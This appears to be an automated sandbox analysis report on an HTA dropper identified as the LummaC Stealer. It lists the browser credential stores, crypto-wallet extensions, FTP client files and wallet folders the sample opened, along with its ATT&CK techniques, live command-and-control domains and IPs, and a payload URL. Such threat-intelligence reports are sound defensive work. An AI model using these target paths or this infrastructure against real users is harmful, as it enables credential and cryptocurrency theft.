                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\key4.dbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\LSBIHQFDVTJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\ZGGKNSUKOPJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\QCFWYSKMHAJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDBJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NVWZAPQSQLJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents\NEBFQQYWPSJump to behavior
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6648, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts21
                Windows Management Instrumentation                		1
                DLL Side-Loading                		111
                Process Injection                		1
                Masquerading                		2
                OS Credential Dumping                		221
                Security Software Discovery                		Remote Services1
                Email Collection                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts2
                Command and Scripting Interpreter                		Boot or Logon Initialization Scripts1
                DLL Side-Loading                		121
                Virtualization/Sandbox Evasion                		LSASS Memory1
                Process Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain Accounts3
                PowerShell                		Logon Script (Windows)Logon Script (Windows)111
                Process Injection                		Security Account Manager121
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Deobfuscate/Decode Files or Information                		NTDS1
                Application Window Discovery                		Distributed Component Object Model2
                Clipboard Data                		114
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script3
                Obfuscated Files or Information                		LSA Secrets12
                File and Directory Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Software Packing                		Cached Domain Credentials23
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                DLL Side-Loading                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1580268 Sample: singl6.mp4.hta Startdate: 24/12/2024 Architecture: WINDOWS Score: 100 27 surmisehotte.click 2->27 29 journal.liveview.pw 2->29 37 Suricata IDS alerts for network traffic 2->37 39 Found malware configuration 2->39 41 Malicious sample detected (through community Yara rule) 2->41 43 11 other signatures 2->43 9 mshta.exe 1 2->9         started        signatures3 process4 signatures5 53 Suspicious powershell command line found 9->53 12 powershell.exe 17 9->12         started        process6 signatures7 55 Suspicious powershell command line found 12->55 57 Found many strings related to Crypto-Wallets (likely being stolen) 12->57 59 Bypasses PowerShell execution policy 12->59 61 2 other signatures 12->61 15 powershell.exe 15 16 12->15         started        19 conhost.exe 12->19         started        process8 dnsIp9 33 journal.liveview.pw 104.21.37.173, 443, 49719 CLOUDFLARENETUS United States 15->33 35 Injects a PE file into a foreign processes 15->35 21 powershell.exe 15->21         started        25 conhost.exe 15->25         started        signatures10 process11 dnsIp12 31 surmisehotte.click 104.21.64.1, 443, 49958, 49964 CLOUDFLARENETUS United States 21->31 45 Query firmware table information (likely to detect VMs) 21->45 47 Found many strings related to Crypto-Wallets (likely being stolen) 21->47 49 Tries to harvest and steal ftp login credentials 21->49 51 3 other signatures 21->51 signatures13

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                singl6.mp4.hta5%ReversingLabs
                singl6.mp4.hta10%VirustotalBrowse

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://surmisehotte.click/apiC0%Avira URL Cloudsafe
                https://journal.liveview.pw0%Avira URL Cloudsafe
                https://surmisehotte.click/=0%Avira URL Cloudsafe
                https://surmisehotte.click/tc0%Avira URL Cloudsafe
                surmisehotte.click0%Avira URL Cloudsafe
                https://surmisehotte.click/0%Avira URL Cloudsafe
                https://bridge.sfo1.adm0%Avira URL Cloudsafe
                https://surmisehotte.click/api0%Avira URL Cloudsafe
                https://journal.liveview.pw/singl6.vsdx100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                surmisehotte.click
                		104.21.64.1
                		truetrue
                  		unknown
                  journal.liveview.pw
                  		104.21.37.173
                  		truetrue
                    		unknown

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    necklacebudi.latfalse
                      		high
                      aspecteirs.latfalse
                        		high
                        energyaffai.latfalse
                          		high
                          https://surmisehotte.click/apitrue
                          • Avira URL Cloud: safe
                          		unknown
                          surmisehotte.clicktrue
                          • Avira URL Cloud: safe
                          		unknown
                          sustainskelet.latfalse
                            		high
                            crosshuaht.latfalse
                              		high
                              rapeflowwj.latfalse
                                		high
                                grannyejh.latfalse
                                  		high
                                  discokeyus.latfalse
                                    		high
                                    https://journal.liveview.pw/singl6.vsdxtrue
                                    • Avira URL Cloud: malware
                                    		unknown

                                    URLs from Memory and Binaries

                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.2253229810.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYipowershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://contoso.com/Licensepowershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://journal.liveview.pwpowershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmptrue
                                              • Avira URL Cloud: safe
                                              		unknown
                                              https://contoso.com/Iconpowershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.microsoft.powershell.exe, 00000002.00000002.2249066448.00000000007DA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://surmisehotte.click/apiCpowershell.exe, 00000008.00000002.3470317954.00000000006C9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://github.com/Pester/Pesterpowershell.exe, 00000004.00000002.3262753707.0000000004BC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://surmisehotte.click/tcpowershell.exe, 00000008.00000002.3475273003.0000000000756000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://aka.ms/pscore6lBpowershell.exe, 00000002.00000002.2250678639.0000000004851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000004A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgpowershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://surmisehotte.click/=powershell.exe, 00000008.00000002.3470317954.00000000006EB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://bridge.sfo1.admpowershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://contoso.com/powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.2253229810.00000000058B8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000005AD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3powershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://surmisehotte.click/powershell.exe, 00000008.00000002.3477065714.0000000004B27000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.3475273003.0000000000756000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: safe
                                                                		unknown
                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000002.00000002.2250678639.0000000004851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.3262753707.0000000004A71000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&ctapowershell.exe, 00000008.00000002.3478618053.0000000004BB6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high

                                                                    World Map of Contacted IPs

                                                                    • No. of IPs < 25%
                                                                    • 25% < No. of IPs < 50%
                                                                    • 50% < No. of IPs < 75%
                                                                    • 75% < No. of IPs

                                                                    Public IPs

                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                    104.21.64.1
                                                                    		surmisehotte.clickUnited States
                                                                    		13335CLOUDFLARENETUStrue
                                                                    104.21.37.173
                                                                    		journal.liveview.pwUnited States
                                                                    		13335CLOUDFLARENETUStrue

                                                                    General Information

                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                    Analysis ID:1580268
                                                                    Start date and time:2024-12-24 08:28:06 +01:00
                                                                    Joe Sandbox product:CloudBasic
                                                                    Overall analysis duration:0h 8m 16s
                                                                    Hypervisor based Inspection enabled:false
                                                                    Report type:full
                                                                    Cookbook file name:default.jbs
                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                    Number of analysed new started processes analysed:9
                                                                    Number of new started drivers analysed:0
                                                                    Number of existing processes analysed:0
                                                                    Number of existing drivers analysed:0
                                                                    Number of injected processes analysed:0
                                                                    Technologies:
                                                                    • HCA enabled
                                                                    • EGA enabled
                                                                    • AMSI enabled
                                                                    Analysis Mode:default
                                                                    Analysis stop reason:Timeout
                                                                    Sample name:singl6.mp4.hta
                                                                    Detection:MAL
                                                                    Classification:mal100.troj.spyw.evad.winHTA@9/6@2/2
                                                                    EGA Information:
                                                                    • Successful, ratio: 50%
                                                                    HCA Information:
                                                                    • Successful, ratio: 88%
                                                                    • Number of executed functions: 143
                                                                    • Number of non-executed functions: 17
                                                                    Cookbook Comments:
                                                                    • Found application associated with file extension: .hta
                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                    • Stop behavior analysis, all processes terminated

                                                                    Warnings

                                                                    • Exclude process from analysis (whitelisted): WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                    • Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 4.175.87.197
                                                                    • Excluded domains from analysis (whitelisted): client.wns.windows.com, fs.microsoft.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                    • Execution Graph export aborted for target mshta.exe, PID 3384 because there are no executed function
                                                                    • Execution Graph export aborted for target powershell.exe, PID 1056 because it is empty
                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                    Simulations

                                                                    Behavior and APIs

                                                                    TimeTypeDescription
                                                                    02:29:01API Interceptor95x Sleep call for process: powershell.exe modified

                                                                    Joe Sandbox View / Context

                                                                    IPs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    104.21.64.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                    • adsfirm.com/administrator/index.php
                                                                    PO2412010.exeGet hashmaliciousFormBookBrowse
                                                                    • www.bser101pp.buzz/v89f/

                                                                    Domains

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext

                                                                    ASNs

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    CLOUDFLARENETUSHALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 172.67.169.205
                                                                    qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.195.241
                                                                    txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.151.61
                                                                    hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 172.65.251.78
                                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 8.6.115.225
                                                                    nklmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 104.29.132.180
                                                                    eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.177.88
                                                                    Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.29.252
                                                                    CLOUDFLARENETUSHALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 172.67.177.134
                                                                    eMBO6wS1b5.exeGet hashmaliciousLummaC StealerBrowse
                                                                    • 172.67.169.205
                                                                    qoqD1RxV0F.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.195.241
                                                                    txUcQFc0aJ.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.151.61
                                                                    hnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 172.65.251.78
                                                                    nabarm5.elfGet hashmaliciousUnknownBrowse
                                                                    • 8.6.115.225
                                                                    nklmips.elfGet hashmaliciousUnknownBrowse
                                                                    • 104.29.132.180
                                                                    eCompleted_419z.pdfGet hashmaliciousUnknownBrowse
                                                                    • 104.18.95.41
                                                                    Setup.exeGet hashmaliciousLummaCBrowse
                                                                    • 172.67.177.88
                                                                    Adobe GenP 5.exeGet hashmaliciousLummaCBrowse
                                                                    • 104.21.29.252

                                                                    JA3 Fingerprints

                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    3b5074b1b5d032e5620f69f9f700ff0ehnskdfgjgar22.batGet hashmaliciousAbobus Obfuscator, BraodoBrowse
                                                                    • 104.21.37.173
                                                                    Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                    • 104.21.37.173
                                                                    Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                    • 104.21.37.173
                                                                    WO.exeGet hashmaliciousMetasploitBrowse
                                                                    • 104.21.37.173
                                                                    ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                    • 104.21.37.173
                                                                    payment_3493.pdfGet hashmaliciousUnknownBrowse
                                                                    • 104.21.37.173
                                                                    1lhZVZx5nD.exeGet hashmaliciousStealc, VidarBrowse
                                                                    • 104.21.37.173
                                                                    Archivo-PxFkiLTWYG-23122024095010.htaGet hashmaliciousUnknownBrowse
                                                                    • 104.21.37.173
